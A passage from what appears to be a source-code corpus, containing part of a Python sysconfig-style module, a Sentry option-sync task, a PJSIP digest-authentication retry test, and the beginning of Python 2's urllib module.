'{projectbase}/.') _cfg_read = True _SCHEMES = configparser.RawConfigParser() _VAR_REPL = re.compile(r'\{([^{]*?)\}') def _expand_globals(config): _ensure_cfg_read() if config.has_section('globals'): globals = config.items('globals') else: globals = tuple() sections = config.sections() for section in sections: if section == 'globals': continue for option, value in globals: if config.has_option(section, option): continue config.set(section, option, value) config.remove_section('globals') # now expanding local variables defined in the cfg file # for section in config.sections(): variables = dict(config.items(section)) def _replacer(matchobj): name = matchobj.group(1) if name in variables: return variables[name] return matchobj.group(0) for option, value in config.items(section): config.set(section, option, _VAR_REPL.sub(_replacer, value)) #_expand_globals(_SCHEMES) # FIXME don't rely on sys.version here, its format is an implementation detail # of CPython, use sys.version_info or sys.hexversion _PY_VERSION = sys.version.split()[0] _PY_VERSION_SHORT = sys.version[:3] _PY_VERSION_SHORT_NO_DOT = _PY_VERSION[0] + _PY_VERSION[2] _PREFIX = os.path.normpath(sys.prefix) _EXEC_PREFIX = os.path.normpath(sys.exec_prefix) _CONFIG_VARS = None _USER_BASE = None def _subst_vars(path, local_vars): """In the string `path`, replace tokens like {some.thing} with the corresponding value from the map `local_vars`. If there is no corresponding value, leave the token unchanged. 
""" def _replacer(matchobj): name = matchobj.group(1) if name in local_vars: return local_vars[name] elif name in os.environ: return os.environ[name] return matchobj.group(0) return _VAR_REPL.sub(_replacer, path) def _extend_dict(target_dict, other_dict): target_keys = target_dict.keys() for key, value in other_dict.items(): if key in target_keys: continue target_dict[key] = value def _expand_vars(scheme, vars): res = {} if vars is None: vars = {} _extend_dict(vars, get_config_vars()) for key, value in _SCHEMES.items(scheme): if os.name in ('posix', 'nt'): value = os.path.expanduser(value) res[key] = os.path.normpath(_subst_vars(value, vars)) return res def format_value(value, vars): def _replacer(matchobj): name = matchobj.group(1) if name in vars: return vars[name] return matchobj.group(0) return _VAR_REPL.sub(_replacer, value) def _get_default_scheme(): if os.name == 'posix': # the default scheme for posix is posix_prefix return 'posix_prefix' return os.name def _getuserbase(): env_base = os.environ.get("PYTHONUSERBASE", None) def joinuser(*args): return os.path.expanduser(os.path.join(*args)) # what about 'os2emx', 'riscos' ? if os.name == "nt": base = os.environ.get("APPDATA") or "~" if env_base: return env_base else: return joinuser(base, "Python") if sys.platform == "darwin": framework = get_config_var("PYTHONFRAMEWORK") if framework: if env_base: return env_base else: return joinuser("~", "Library", framework, "%d.%d" % sys.version_info[:2]) if env_base: return env_base else: return joinuser("~", ".local") def _parse_makefile(filename, vars=None): """Parse a Makefile-style file. A dictionary containing name/value pairs is returned. If an optional dictionary is passed in as the second argument, it is used instead of a new dictionary. """ # Regexes needed for parsing Makefile (and similar syntaxes, # like old-style Setup files). 
_variable_rx = re.compile(r"([a-zA-Z][a-zA-Z0-9_]+)\s*=\s*(.*)") _findvar1_rx = re.compile(r"\$\(([A-Za-z][A-Za-z0-9_]*)\)") _findvar2_rx = re.compile(r"\${([A-Za-z][A-Za-z0-9_]*)}") if vars is None: vars = {} done = {} notdone = {} with codecs.open(filename, encoding='utf-8', errors="surrogateescape") as f: lines = f.readlines() for line in lines: if line.startswith('#') or line.strip() == '': continue m = _variable_rx.match(line) if m: n, v = m.group(1, 2) v = v.strip() # `$$' is a literal `$' in make tmpv = v.replace('$$', '') if "$" in tmpv: notdone[n] = v else: try: v = int(v) except ValueError: # insert literal `$' done[n] = v.replace('$$', '$') else: done[n] = v # do variable interpolation here variables = list(notdone.keys()) # Variables with a 'PY_' prefix in the makefile. These need to # be made available without that prefix through sysconfig. # Special care is needed to ensure that variable expansion works, even # if the expansion uses the name without a prefix. renamed_variables = ('CFLAGS', 'LDFLAGS', 'CPPFLAGS') while len(variables) > 0: for name in tuple(variables): value = notdone[name] m = _findvar1_rx.search(value) or _findvar2_rx.search(value) if m is not None: n = m.group(1) found = True if n in done: item = str(done[n]) elif n in notdone: # get it on a subsequent round found = False elif n in os.environ: # do it like make: fall back to environment item = os.environ[n] elif n in renamed_variables: if (name.startswith('PY_') and name[3:] in renamed_variables): item = "" elif 'PY_' + n in notdone: found = False else: item = str(done['PY_' + n]) else: done[n] = item = "" if found: after = value[m.end():] value = value[:m.start()] + item + after if "$" in after: notdone[name] = value else: try: value = int(value) except ValueError: done[name] = value.strip() else: done[name] = value variables.remove(name) if (name.startswith('PY_') and name[3:] in renamed_variables): name = name[3:] if name not in done: done[name] = value else: # bogus variable 
reference (e.g. "prefix=$/opt/python"); # just drop it since we can't deal done[name] = value variables.remove(name) # strip spurious spaces for k, v in done.items(): if isinstance(v, str): done[k] = v.strip() # save the results in the global dictionary vars.update(done) return vars def get_makefile_filename(): """Return the path of the Makefile.""" if _PYTHON_BUILD: return os.path.join(_PROJECT_BASE, "Makefile") if hasattr(sys, 'abiflags'): config_dir_name = 'config-%s%s' % (_PY_VERSION_SHORT, sys.abiflags) else: config_dir_name = 'config' return os.path.join(get_path('stdlib'), config_dir_name, 'Makefile') def _init_posix(vars): """Initialize the module as appropriate for POSIX systems.""" # load the installed Makefile: makefile = get_makefile_filename() try: _parse_makefile(makefile, vars) except IOError as e: msg = "invalid Python installation: unable to open %s" % makefile if hasattr(e, "strerror"): msg = msg + " (%s)" % e.strerror raise IOError(msg) # load the installed pyconfig.h: config_h = get_config_h_filename() try: with open(config_h) as f: parse_config_h(f, vars) except IOError as e: msg = "invalid Python installation: unable to open %s" % config_h if hasattr(e, "strerror"): msg = msg + " (%s)" % e.strerror raise IOError(msg) # On AIX, there are wrong paths to the linker scripts in the Makefile # -- these paths are relative to the Python source, but when installed # the scripts are in another directory. if _PYTHON_BUILD: vars['LDSHARED'] = vars['BLDSHARED'] def _init_non_posix(vars): """Initialize the module as appropriate for NT""" # set basic install directories vars['LIBDEST'] = get_path('stdlib') vars['BINLIBDEST'] = get_path('platstdlib') vars['INCLUDEPY'] = get_path('include') vars['SO'] = '.pyd' vars['EXE'] = '.exe' vars['VERSION'] = _PY_VERSION_SHORT_NO_DOT vars['BINDIR'] = os.path.dirname(_safe_realpath(sys.executable)) # # public APIs # def parse_config_h(fp, vars=None): """Parse a config.h-style file. 
A dictionary containing name/value pairs is returned. If an optional dictionary is passed in as the second argument, it is used instead of a new dictionary. """ if vars is None: vars = {} define_rx = re.compile("#define ([A-Z][A-Za-z0-9_]+) (.*)\n") undef_rx = re.compile("/[*] #undef ([A-Z][A-Za-z0-9_]+) [*]/\n") while True: line = fp.readline() if not line: break m = define_rx.match(line) if m: n, v = m.group(1, 2) try: v = int(v) except ValueError: pass vars[n] = v else: m = undef_rx.match(line) if m: vars[m.group(1)] = 0 return vars def get_config_h_filename(): """Return the path of pyconfig.h.""" if _PYTHON_BUILD: if os.name == "nt": inc_dir = os.path.join(_PROJECT_BASE, "PC") else: inc_dir = _PROJECT_BASE else: inc_dir = get_path('platinclude') return os.path.join(inc_dir, 'pyconfig.h') def get_scheme_names(): """Return a tuple containing the schemes names.""" return tuple(sorted(_SCHEMES.sections())) def get_path_names(): """Return a tuple containing the paths names.""" # xxx see if we want a static list return _SCHEMES.options('posix_prefix') def get_paths(scheme=_get_default_scheme(), vars=None, expand=True): """Return a mapping containing an install scheme. ``scheme`` is the install scheme name. If not provided, it will return the default scheme for the current platform. """ _ensure_cfg_read() if expand: return _expand_vars(scheme, vars) else: return dict(_SCHEMES.items(scheme)) def get_path(name, scheme=_get_default_scheme(), vars=None, expand=True): """Return a path corresponding to the scheme. ``scheme`` is the install scheme name. """ return get_paths(scheme, vars, expand)[name] def get_config_vars(*args): """With no arguments, return a dictionary of all configuration variables relevant for the current platform. On Unix, this means every variable defined in Python's installed Makefile; On Windows and Mac OS it's a much smaller set. 
With arguments, return a list of values that result from looking up each argument in the configuration variable dictionary. """ global _CONFIG_VARS if _CONFIG_VARS is None: _CONFIG_VARS = {} # Normalized versions of prefix and exec_prefix are handy to have; # in fact, these are the standard versions used most places in the # distutils2 module. _CONFIG_VARS['prefix'] = _PREFIX _CONFIG_VARS['exec_prefix'] = _EXEC_PREFIX _CONFIG_VARS['py_version'] = _PY_VERSION _CONFIG_VARS['py_version_short'] = _PY_VERSION_SHORT _CONFIG_VARS['py_version_nodot'] = _PY_VERSION[0] + _PY_VERSION[2] _CONFIG_VARS['base'] = _PREFIX _CONFIG_VARS['platbase'] = _EXEC_PREFIX _CONFIG_VARS['projectbase'] = _PROJECT_BASE try: _CONFIG_VARS['abiflags'] = sys.abiflags except AttributeError: # sys.abiflags may not be defined on all platforms. _CONFIG_VARS['abiflags'] = '' if os.name in ('nt', 'os2'): _init_non_posix(_CONFIG_VARS) if os.name == 'posix': _init_posix(_CONFIG_VARS) # Setting 'userbase' is done below the call to the # init function to enable using 'get_config_var' in # the init-function. if sys.version >= '2.6': _CONFIG_VARS['userbase'] = _getuserbase() if 'srcdir' not in _CONFIG_VARS: _CONFIG_VARS['srcdir'] = _PROJECT_BASE else: _CONFIG_VARS['srcdir'] = _safe_realpath(_CONFIG_VARS['srcdir']) # Convert srcdir into an absolute path if it appears necessary. # Normally it is relative to the build directory. However, during # testing, for example, we might be running a non-installed python # from a different directory. if _PYTHON_BUILD and os.name == "posix": base = _PROJECT_BASE try: cwd = os.getcwd() except OSError: cwd = None if (not os.path.isabs(_CONFIG_VARS['srcdir']) and base != cwd): # srcdir is relative and we are not in the same directory # as the executable. Assume executable is in the build # directory and make srcdir absolute. 
srcdir = os.path.join(base, _CONFIG_VARS['srcdir']) _CONFIG_VARS['srcdir'] = os.path.normpath(srcdir) if sys.platform == 'darwin': kernel_version = os.uname()[2] # Kernel version (8.4.3) major_version = int(kernel_version.split('.')[0]) if major_version < 8: # On Mac OS X before 10.4, check if -arch and -isysroot # are in CFLAGS or LDFLAGS and remove them if they are. # This is needed when building extensions on a 10.3 system # using a universal build of python. for key in ('LDFLAGS', 'BASECFLAGS', # a number of derived variables. These need to be # patched up as well. 'CFLAGS', 'PY_CFLAGS', 'BLDSHARED'): flags = _CONFIG_VARS[key] flags = re.sub(r'-arch\s+\w+\s', ' ', flags) flags = re.sub('-isysroot [^ \t]*', ' ', flags) _CONFIG_VARS[key] = flags else: # Allow the user to override the architecture flags using # an environment variable. # NOTE: This name was introduced by Apple in OSX 10.5 and # is used by several scripting languages distributed with # that OS release. if 'ARCHFLAGS' in os.environ: arch = os.environ['ARCHFLAGS'] for key in ('LDFLAGS', 'BASECFLAGS', # a number of derived variables. These need to be # patched up as well. 'CFLAGS', 'PY_CFLAGS', 'BLDSHARED'): flags = _CONFIG_VARS[key] flags = re.sub(r'-arch\s+\w+\s', ' ', flags) flags = flags + ' ' + arch _CONFIG_VARS[key] = flags # If we're on OSX 10.5 or later and the user tries to # compiles an extension using an SDK that is not present # on the current machine it is better to not use an SDK # than to fail. # # The major usecase for this is users using a Python.org # binary installer on OSX 10.6: that installer uses # the 10.4u SDK, but that SDK is not installed by default # when you install Xcode. # CFLAGS = _CONFIG_VARS.get('CFLAGS', '') m = re.search(r'-isysroot\s+(\S+)', CFLAGS) if m is not None: sdk = m.group(1) if not os.path.exists(sdk): for key in ('LDFLAGS', 'BASECFLAGS', # a number of derived variables. These need to be # patched up as well. 
'CFLAGS', 'PY_CFLAGS', 'BLDSHARED'): flags = _CONFIG_VARS[key] flags = re.sub(r'-isysroot\s+\S+(\s|$)', ' ', flags) _CONFIG_VARS[key] = flags if args: vals = [] for name in args: vals.append(_CONFIG_VARS.get(name)) return vals else: return _CONFIG_VARS def get_config_var(name): """Return the value of a single variable using the dictionary returned by 'get_config_vars()'. Equivalent to get_config_vars().get(name) """ return get_config_vars().get(name) def get_platform(): """Return a string that identifies the current platform. This is used mainly to distinguish platform-specific build directories and platform-specific built distributions. Typically includes the OS name and version and the architecture (as supplied by 'os.uname()'), although the exact information included depends on the OS; eg. for IRIX the architecture isn't particularly important (IRIX only runs on SGI hardware), but for Linux the kernel version isn't particularly important. Examples of returned values: linux-i586 linux-alpha (?) solaris-2.6-sun4u irix-5.3 irix64-6.2 Windows will return one of: win-amd64 (64bit Windows on AMD64 (aka x86_64, Intel64, EM64T, etc) win-ia64 (64bit Windows on Itanium) win32 (all others - specifically, sys.platform is returned) For other non-POSIX platforms, currently just returns 'sys.platform'. """ if os.name == 'nt': # sniff sys.version for architecture. prefix = " bit (" i = sys.version.find(prefix) if i == -1: return sys.platform j = sys.version.find(")", i) look = sys.version[i+len(prefix):j].lower() if look == 'amd64': return 'win-amd64' if look == 'itanium': return 'win-ia64' return sys.platform if os.name != "posix" or not hasattr(os, 'uname'): # XXX what about the architecture? NT is Intel or Alpha, # Mac OS is M68k or PPC, etc. 
return sys.platform # Try to distinguish various flavours of Unix osname, host, release, version, machine = os.uname() # Convert the OS name to lowercase, remove '/' characters # (to accommodate BSD/OS), and translate spaces (for "Power Macintosh") osname = osname.lower().replace('/', '') machine = machine.replace(' ', '_') machine = machine.replace('/', '-') if osname[:5] == "linux": # At least on Linux/Intel, 'machine' is the processor -- # i386, etc. # XXX what about Alpha, SPARC, etc? return "%s-%s" % (osname, machine) elif osname[:5] == "sunos": if release[0] >= "5": # SunOS 5 == Solaris 2 osname = "solaris" release = "%d.%s" % (int(release[0]) - 3, release[2:]) # fall through to standard osname-release-machine representation elif osname[:4] == "irix": # could be "irix64"! return "%s-%s" % (osname, release) elif osname[:3] == "aix": return "%s-%s.%s" % (osname, version, release) elif osname[:6] == "cygwin": osname = "cygwin" rel_re = re.compile(r'[\d.]+') m = rel_re.match(release) if m: release = m.group() elif osname[:6] == "darwin": # # For our purposes, we'll assume that the system version from # distutils' perspective is what MACOSX_DEPLOYMENT_TARGET is set # to. This makes the compatibility story a bit more sane because the # machine is going to compile and link as if it were # MACOSX_DEPLOYMENT_TARGET. cfgvars = get_config_vars() macver = cfgvars.get('MACOSX_DEPLOYMENT_TARGET') if True: # Always calculate the release of the running machine, # needed to determine if we can build fat binaries or not. macrelease = macver # Get the system version. Reading this plist is a documented # way to get the system version (see the documentation for # the Gestalt Manager) try: f = open('/System/Library/CoreServices/SystemVersion.plist') except IOError: # We're on a plain darwin box, fall back to the default # behaviour. 
pass else: try: m = re.search(r'<key>ProductUserVisibleVersion</key>\s*' r'<string>(.*?)</string>', f.read()) finally: f.close() if m is not None: macrelease = '.'.join(m.group(1).split('.')[:2]) # else: fall back to the default behaviour if not macver: macver = macrelease if macver: release = macver osname = "macosx" if ((macrelease + '.') >= '10.4.' and '-arch' in get_config_vars().get('CFLAGS', '').strip()): # The universal build will build fat binaries, but not on # systems before 10.4 # # Try to detect 4-way universal builds, those have machine-type # 'universal' instead of 'fat'. machine = 'fat' cflags = get_config_vars().get('CFLAGS') archs = re.findall(r'-arch\s+(\S+)', cflags) archs = tuple(sorted(set(archs))) if len(archs) == 1: machine = archs[0] elif archs == ('i386', 'ppc'): machine = 'fat' elif archs == ('i386', 'x86_64'): machine = 'intel' elif archs == ('i386', 'ppc', 'x86_64'): machine = 'fat3' elif archs == ('ppc64', 'x86_64'): machine = 'fat64' elif archs == ('i386', 'ppc', 'ppc64', 'x86_64'): machine = 'universal' else: raise ValueError( "Don't know machine value for archs=%r" % (archs,)) elif machine == 'i386': # On OSX the machine type returned by uname is always the # 32-bit variant, even if the executable architecture is # the 64-bit variant if sys.maxsize >= 2**32: machine = 'x86_64' elif machine in ('PowerPC', 'Power_Macintosh'): # Pick a sane name for the PPC architecture. 
# See 'i386' case if sys.maxsize >= 2**32: machine = 'ppc64' else: machine = 'ppc' return "%s-%s-%s" % (osname, release, machine) def get_python_version(): return _PY_VERSION_SHORT def _print_dict(title, data): for index, (key, value) in enumerate(sorted(data.items())): if index == 0: print('%s: ' % (title)) print('\t%s = "%s"' % (key, value)) def _main(): """Display all information sysconfig detains.""" print('Platform: "%s"' % get_platform()) print('Python version: "%s"' % get_python_version()) print('Current installation scheme: "%s"' % _get_default_scheme()) print() _print_dict('Paths', get_paths()) print() _print_dict('Variables', get_config_vars()) if __name__ == '__main__': _main()
apache-2.0
gg7/sentry
src/sentry/tasks/options.py
27
1173
""" sentry.tasks.options ~~~~~~~~~~~~~~~~~~~~ :copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details. :license: BSD, see LICENSE for more details. """ from __future__ import absolute_import from datetime import timedelta from django.utils import timezone from sentry.models import Option from sentry.options import default_manager from sentry.tasks.base import instrumented_task ONE_HOUR = 60 * 60 @instrumented_task(name='sentry.tasks.options.sync_options', queue='options') def sync_options(cutoff=ONE_HOUR): """ Ensures all options that have been updated (within the database) since ``cutoff`` have their correct values stored in the cache. This **does not** guarantee that the correct value is written into the cache though it will correct itself in the next update window. """ cutoff_dt = timezone.now() - timedelta(seconds=cutoff) # TODO(dcramer): this doesnt handle deleted options (which shouldn't be allowed) for option in Option.objects.filter(last_updated__gte=cutoff_dt).iterator(): default_manager.update_cached_value( key=option.key, value=option.value, )
bsd-3-clause
VoIPGRID/PJSIP
tests/pjsua/scripts-recvfrom/231_reg_bad_fail_stale_false_nonce_changed.py
42
1562
# $Id$ import inc_sip as sip import inc_sdp as sdp # In this test we simulate broken server, where: # - it wants to signal that NONCE has change # - but it sets stale=false # For this case pjsip will retry authentication until # PJSIP_MAX_STALE_COUNT is exceeded. # pjsua = "--null-audio --id=sip:CLIENT --registrar sip:127.0.0.1:$PORT " + \ "--realm=python --user=username --password=password" req1 = sip.RecvfromTransaction("Initial request", 401, include=["REGISTER sip"], exclude=["Authorization"], resp_hdr=["WWW-Authenticate: Digest realm=\"python\", nonce=\"1\""] ) req2 = sip.RecvfromTransaction("First retry", 401, include=["REGISTER sip", "Authorization", "nonce=\"1\""], exclude=["Authorization:[\\s\\S]+Authorization:"], resp_hdr=["WWW-Authenticate: Digest realm=\"python\", nonce=\"2\", stale=true"] ) req3 = sip.RecvfromTransaction("Second retry retry", 401, include=["REGISTER sip", "Authorization", "nonce=\"2\""], exclude=["Authorization:[\\s\\S]+Authorization:"], resp_hdr=["WWW-Authenticate: Digest realm=\"python\", nonce=\"3\", stale=true"] ) req4 = sip.RecvfromTransaction("Third retry", 401, include=["REGISTER sip", "Authorization", "nonce=\"3\""], exclude=["Authorization:[\\s\\S]+Authorization:"], resp_hdr=["WWW-Authenticate: Digest realm=\"python\", nonce=\"4\", stale=true"], expect="PJSIP_EAUTHSTALECOUNT" ) recvfrom_cfg = sip.RecvfromCfg("Failed registration retry (server rejects with stale=true) ", pjsua, [req1, req2, req3, req4])
gpl-2.0
olapaola/olapaola-android-scripting
python/src/Lib/urllib.py
48
64844
"""Open an arbitrary URL. See the following document for more info on URLs: "Names and Addresses, URIs, URLs, URNs, URCs", at http://www.w3.org/pub/WWW/Addressing/Overview.html See also the HTTP spec (from which the error codes are derived): "HTTP - Hypertext Transfer Protocol", at http://www.w3.org/pub/WWW/Protocols/ Related standards and specs: - RFC1808: the "relative URL" spec. (authoritative status) - RFC1738 - the "URL standard". (authoritative status) - RFC1630 - the "URI spec". (informational status) The object returned by URLopener().open(file) will differ per protocol. All you know is that is has methods read(), readline(), readlines(), fileno(), close() and info(). The read*(), fileno() and close() methods work like those of open files. The info() method returns a mimetools.Message object which can be used to query various info about the object, if available. (mimetools.Message objects are queried with the getheader() method.) """ import string import socket import os import time import sys from urlparse import urljoin as basejoin import warnings __all__ = ["urlopen", "URLopener", "FancyURLopener", "urlretrieve", "urlcleanup", "quote", "quote_plus", "unquote", "unquote_plus", "urlencode", "url2pathname", "pathname2url", "splittag", "localhost", "thishost", "ftperrors", "basejoin", "unwrap", "splittype", "splithost", "splituser", "splitpasswd", "splitport", "splitnport", "splitquery", "splitattr", "splitvalue", "getproxies"] __version__ = '1.17' # XXX This version is not always updated :-( MAXFTPCACHE = 10 # Trim the ftp cache beyond this size # Helper for non-unix systems if os.name == 'mac': from macurl2path import url2pathname, pathname2url elif os.name == 'nt': from nturl2path import url2pathname, pathname2url elif os.name == 'riscos': from rourl2path import url2pathname, pathname2url else: def url2pathname(pathname): """OS-specific conversion from a relative URL of the 'file' scheme to a file system path; not recommended for general use.""" return 
unquote(pathname) def pathname2url(pathname): """OS-specific conversion from a file system path to a relative URL of the 'file' scheme; not recommended for general use.""" return quote(pathname) # This really consists of two pieces: # (1) a class which handles opening of all sorts of URLs # (plus assorted utilities etc.) # (2) a set of functions for parsing URLs # XXX Should these be separated out into different modules? # Shortcut for basic usage _urlopener = None def urlopen(url, data=None, proxies=None): """Create a file-like object for the specified URL to read from.""" from warnings import warnpy3k warnings.warnpy3k("urllib.urlopen() has been removed in Python 3.0 in " "favor of urllib2.urlopen()", stacklevel=2) global _urlopener if proxies is not None: opener = FancyURLopener(proxies=proxies) elif not _urlopener: opener = FancyURLopener() _urlopener = opener else: opener = _urlopener if data is None: return opener.open(url) else: return opener.open(url, data) def urlretrieve(url, filename=None, reporthook=None, data=None): global _urlopener if not _urlopener: _urlopener = FancyURLopener() return _urlopener.retrieve(url, filename, reporthook, data) def urlcleanup(): if _urlopener: _urlopener.cleanup() # check for SSL try: import ssl except: _have_ssl = False else: _have_ssl = True # exception raised when downloaded size does not match content-length class ContentTooShortError(IOError): def __init__(self, message, content): IOError.__init__(self, message) self.content = content ftpcache = {} class URLopener: """Class to open URLs. This is a class rather than just a subroutine because we may need more than one set of global protocol-specific options. 
Note -- this is a base class for those who don't want the automatic handling of errors type 302 (relocated) and 401 (authorization needed).""" __tempfiles = None version = "Python-urllib/%s" % __version__ # Constructor def __init__(self, proxies=None, **x509): if proxies is None: proxies = getproxies() assert hasattr(proxies, 'has_key'), "proxies must be a mapping" self.proxies = proxies self.key_file = x509.get('key_file') self.cert_file = x509.get('cert_file') self.addheaders = [('User-Agent', self.version)] self.__tempfiles = [] self.__unlink = os.unlink # See cleanup() self.tempcache = None # Undocumented feature: if you assign {} to tempcache, # it is used to cache files retrieved with # self.retrieve(). This is not enabled by default # since it does not work for changing documents (and I # haven't got the logic to check expiration headers # yet). self.ftpcache = ftpcache # Undocumented feature: you can use a different # ftp cache by assigning to the .ftpcache member; # in case you want logically independent URL openers # XXX This is not threadsafe. Bah. def __del__(self): self.close() def close(self): self.cleanup() def cleanup(self): # This code sometimes runs when the rest of this module # has already been deleted, so it can't use any globals # or import anything. if self.__tempfiles: for file in self.__tempfiles: try: self.__unlink(file) except OSError: pass del self.__tempfiles[:] if self.tempcache: self.tempcache.clear() def addheader(self, *args): """Add a header to be used by the HTTP interface only e.g. 
u.addheader('Accept', 'sound/basic')""" self.addheaders.append(args) # External interface def open(self, fullurl, data=None): """Use URLopener().open(file) instead of open(file, 'r').""" fullurl = unwrap(toBytes(fullurl)) if self.tempcache and fullurl in self.tempcache: filename, headers = self.tempcache[fullurl] fp = open(filename, 'rb') return addinfourl(fp, headers, fullurl) urltype, url = splittype(fullurl) if not urltype: urltype = 'file' if urltype in self.proxies: proxy = self.proxies[urltype] urltype, proxyhost = splittype(proxy) host, selector = splithost(proxyhost) url = (host, fullurl) # Signal special case to open_*() else: proxy = None name = 'open_' + urltype self.type = urltype name = name.replace('-', '_') if not hasattr(self, name): if proxy: return self.open_unknown_proxy(proxy, fullurl, data) else: return self.open_unknown(fullurl, data) try: if data is None: return getattr(self, name)(url) else: return getattr(self, name)(url, data) except socket.error, msg: raise IOError, ('socket error', msg), sys.exc_info()[2] def open_unknown(self, fullurl, data=None): """Overridable interface to open unknown URL type.""" type, url = splittype(fullurl) raise IOError, ('url error', 'unknown url type', type) def open_unknown_proxy(self, proxy, fullurl, data=None): """Overridable interface to open unknown URL type.""" type, url = splittype(fullurl) raise IOError, ('url error', 'invalid proxy for %s' % type, proxy) # External interface def retrieve(self, url, filename=None, reporthook=None, data=None): """retrieve(url) returns (filename, headers) for a local object or (tempfilename, headers) for a remote object.""" url = unwrap(toBytes(url)) if self.tempcache and url in self.tempcache: return self.tempcache[url] type, url1 = splittype(url) if filename is None and (not type or type == 'file'): try: fp = self.open_local_file(url1) hdrs = fp.info() del fp return url2pathname(splithost(url1)[1]), hdrs except IOError, msg: pass fp = self.open(url, data) try: headers 
= fp.info() if filename: tfp = open(filename, 'wb') else: import tempfile garbage, path = splittype(url) garbage, path = splithost(path or "") path, garbage = splitquery(path or "") path, garbage = splitattr(path or "") suffix = os.path.splitext(path)[1] (fd, filename) = tempfile.mkstemp(suffix) self.__tempfiles.append(filename) tfp = os.fdopen(fd, 'wb') try: result = filename, headers if self.tempcache is not None: self.tempcache[url] = result bs = 1024*8 size = -1 read = 0 blocknum = 0 if reporthook: if "content-length" in headers: size = int(headers["Content-Length"]) reporthook(blocknum, bs, size) while 1: block = fp.read(bs) if block == "": break read += len(block) tfp.write(block) blocknum += 1 if reporthook: reporthook(blocknum, bs, size) finally: tfp.close() finally: fp.close() del fp del tfp # raise exception if actual size does not match content-length header if size >= 0 and read < size: raise ContentTooShortError("retrieval incomplete: got only %i out " "of %i bytes" % (read, size), result) return result # Each method named open_<type> knows how to open that type of URL def open_http(self, url, data=None): """Use HTTP protocol.""" import httplib user_passwd = None proxy_passwd= None if isinstance(url, str): host, selector = splithost(url) if host: user_passwd, host = splituser(host) host = unquote(host) realhost = host else: host, selector = url # check whether the proxy contains authorization information proxy_passwd, host = splituser(host) # now we proceed with the url we want to obtain urltype, rest = splittype(selector) url = rest user_passwd = None if urltype.lower() != 'http': realhost = None else: realhost, rest = splithost(rest) if realhost: user_passwd, realhost = splituser(realhost) if user_passwd: selector = "%s://%s%s" % (urltype, realhost, rest) if proxy_bypass(realhost): host = realhost #print "proxy via http:", host, selector if not host: raise IOError, ('http error', 'no host given') if proxy_passwd: import base64 proxy_auth = 
base64.b64encode(proxy_passwd).strip() else: proxy_auth = None if user_passwd: import base64 auth = base64.b64encode(user_passwd).strip() else: auth = None h = httplib.HTTP(host) if data is not None: h.putrequest('POST', selector) h.putheader('Content-Type', 'application/x-www-form-urlencoded') h.putheader('Content-Length', '%d' % len(data)) else: h.putrequest('GET', selector) if proxy_auth: h.putheader('Proxy-Authorization', 'Basic %s' % proxy_auth) if auth: h.putheader('Authorization', 'Basic %s' % auth) if realhost: h.putheader('Host', realhost) for args in self.addheaders: h.putheader(*args) h.endheaders() if data is not None: h.send(data) errcode, errmsg, headers = h.getreply() fp = h.getfile() if errcode == -1: if fp: fp.close() # something went wrong with the HTTP status line raise IOError, ('http protocol error', 0, 'got a bad status line', None) # According to RFC 2616, "2xx" code indicates that the client's # request was successfully received, understood, and accepted. if (200 <= errcode < 300): return addinfourl(fp, headers, "http:" + url, errcode) else: if data is None: return self.http_error(url, fp, errcode, errmsg, headers) else: return self.http_error(url, fp, errcode, errmsg, headers, data) def http_error(self, url, fp, errcode, errmsg, headers, data=None): """Handle http errors. 
Derived class can override this, or provide specific handlers named http_error_DDD where DDD is the 3-digit error code.""" # First check if there's a specific handler for this error name = 'http_error_%d' % errcode if hasattr(self, name): method = getattr(self, name) if data is None: result = method(url, fp, errcode, errmsg, headers) else: result = method(url, fp, errcode, errmsg, headers, data) if result: return result return self.http_error_default(url, fp, errcode, errmsg, headers) def http_error_default(self, url, fp, errcode, errmsg, headers): """Default error handler: close the connection and raise IOError.""" void = fp.read() fp.close() raise IOError, ('http error', errcode, errmsg, headers) if _have_ssl: def open_https(self, url, data=None): """Use HTTPS protocol.""" import httplib user_passwd = None proxy_passwd = None if isinstance(url, str): host, selector = splithost(url) if host: user_passwd, host = splituser(host) host = unquote(host) realhost = host else: host, selector = url # here, we determine, whether the proxy contains authorization information proxy_passwd, host = splituser(host) urltype, rest = splittype(selector) url = rest user_passwd = None if urltype.lower() != 'https': realhost = None else: realhost, rest = splithost(rest) if realhost: user_passwd, realhost = splituser(realhost) if user_passwd: selector = "%s://%s%s" % (urltype, realhost, rest) #print "proxy via https:", host, selector if not host: raise IOError, ('https error', 'no host given') if proxy_passwd: import base64 proxy_auth = base64.b64encode(proxy_passwd).strip() else: proxy_auth = None if user_passwd: import base64 auth = base64.b64encode(user_passwd).strip() else: auth = None h = httplib.HTTPS(host, 0, key_file=self.key_file, cert_file=self.cert_file) if data is not None: h.putrequest('POST', selector) h.putheader('Content-Type', 'application/x-www-form-urlencoded') h.putheader('Content-Length', '%d' % len(data)) else: h.putrequest('GET', selector) if proxy_auth: 
h.putheader('Proxy-Authorization', 'Basic %s' % proxy_auth) if auth: h.putheader('Authorization', 'Basic %s' % auth) if realhost: h.putheader('Host', realhost) for args in self.addheaders: h.putheader(*args) h.endheaders() if data is not None: h.send(data) errcode, errmsg, headers = h.getreply() fp = h.getfile() if errcode == -1: if fp: fp.close() # something went wrong with the HTTP status line raise IOError, ('http protocol error', 0, 'got a bad status line', None) # According to RFC 2616, "2xx" code indicates that the client's # request was successfully received, understood, and accepted. if (200 <= errcode < 300): return addinfourl(fp, headers, "https:" + url, errcode) else: if data is None: return self.http_error(url, fp, errcode, errmsg, headers) else: return self.http_error(url, fp, errcode, errmsg, headers, data) def open_file(self, url): """Use local file or FTP depending on form of URL.""" if not isinstance(url, str): raise IOError, ('file error', 'proxy support for file protocol currently not implemented') if url[:2] == '//' and url[2:3] != '/' and url[2:12].lower() != 'localhost/': return self.open_ftp(url) else: return self.open_local_file(url) def open_local_file(self, url): """Use local file.""" import mimetypes, mimetools, email.utils try: from cStringIO import StringIO except ImportError: from StringIO import StringIO host, file = splithost(url) localname = url2pathname(file) try: stats = os.stat(localname) except OSError, e: raise IOError(e.errno, e.strerror, e.filename) size = stats.st_size modified = email.utils.formatdate(stats.st_mtime, usegmt=True) mtype = mimetypes.guess_type(url)[0] headers = mimetools.Message(StringIO( 'Content-Type: %s\nContent-Length: %d\nLast-modified: %s\n' % (mtype or 'text/plain', size, modified))) if not host: urlfile = file if file[:1] == '/': urlfile = 'file://' + file return addinfourl(open(localname, 'rb'), headers, urlfile) host, port = splitport(host) if not port \ and socket.gethostbyname(host) in 
